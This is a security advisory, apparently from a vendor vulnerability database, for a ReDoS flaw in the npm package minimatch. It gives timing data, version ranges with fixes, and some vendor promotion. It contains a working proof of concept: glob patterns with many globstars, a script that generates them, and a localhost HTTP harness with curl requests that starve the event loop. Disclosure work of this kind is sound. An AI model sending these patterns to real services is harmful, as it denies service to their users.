GHSA-7r86-cg39-jmmj
HIGHminimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.
minimatchnpmDescription
Summary
matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.
Details
The vulnerable loop is in matchOne() at src/index.ts#L960:
while (fr < fl) {
..
if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
..
return true
}
..
fr++
}
When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).
There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.
Measured timing with n=30 path segments:
| k (globstars) | Pattern size | Time |
|---|---|---|
| 7 | 36 bytes | ~154ms |
| 9 | 46 bytes | ~1.2s |
| 11 | 56 bytes | ~5.4s |
| 12 | 61 bytes | ~9.7s |
| 13 | 66 bytes | ~15.9s |
PoC
Tested on [email protected], Node.js 20.
Step 1 -- inline script
import { minimatch } from 'minimatch'
// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'
const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms
To scale the effect, increase k:
// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path = Array(30).fill('a').join('/')
minimatch(path, pattern)
No special options are required. This reproduces with the default minimatch() call.
Step 2 -- HTTP server (event loop starvation proof)
The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:
// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'
const PORT = 3000
const server = http.createServer((req, res) => {
const url = new URL(req.url, `http://localhost:${PORT}`)
if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }
const pattern = url.searchParams.get('pattern') ?? ''
const path = url.searchParams.get('path') ?? ''
const start = process.hrtime.bigint()
const result = minimatch(path, pattern)
const ms = Number(process.hrtime.bigint() - start) / 1e6
res.writeHead(200, { 'Content-Type': 'application/json' })
res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})
server.listen(PORT)
Terminal 1 -- start the server:
node poc1-server.mjs
Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:
curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &
Terminal 3 -- while the attack is in-flight, send a benign request:
curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"
Observed output (Terminal 3):
{"result":true,"ms":"0"}
time_total: 4.132709s
The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:
{"result":true,"ms":"0"}
time_total: 0.001599s
Impact
Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | minimatch | ≥ 10.0.0&&< 10.2.3 | 10.2.3 |
| 📦npm | minimatch | ≥ 9.0.0&&< 9.0.7 | 9.0.7 |
| 📦npm | minimatch | ≥ 8.0.0&&< 8.0.6 | 8.0.6 |
| 📦npm | minimatch | ≥ 7.0.0&&< 7.4.8 | 7.4.8 |
| 📦npm | minimatch | ≥ 6.0.0&&< 6.2.2 | 6.2.2 |
| 📦npm | minimatch | ≥ 5.0.0&&< 5.1.8 | 5.1.8 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for minimatch. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update minimatch to 10.2.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7r86-cg39-jmmj is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-7r86-cg39-jmmj is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-7r86-cg39-jmmj. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-7r86-cg39-jmmj in your dependencies?
O3 detects GHSA-7r86-cg39-jmmj across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.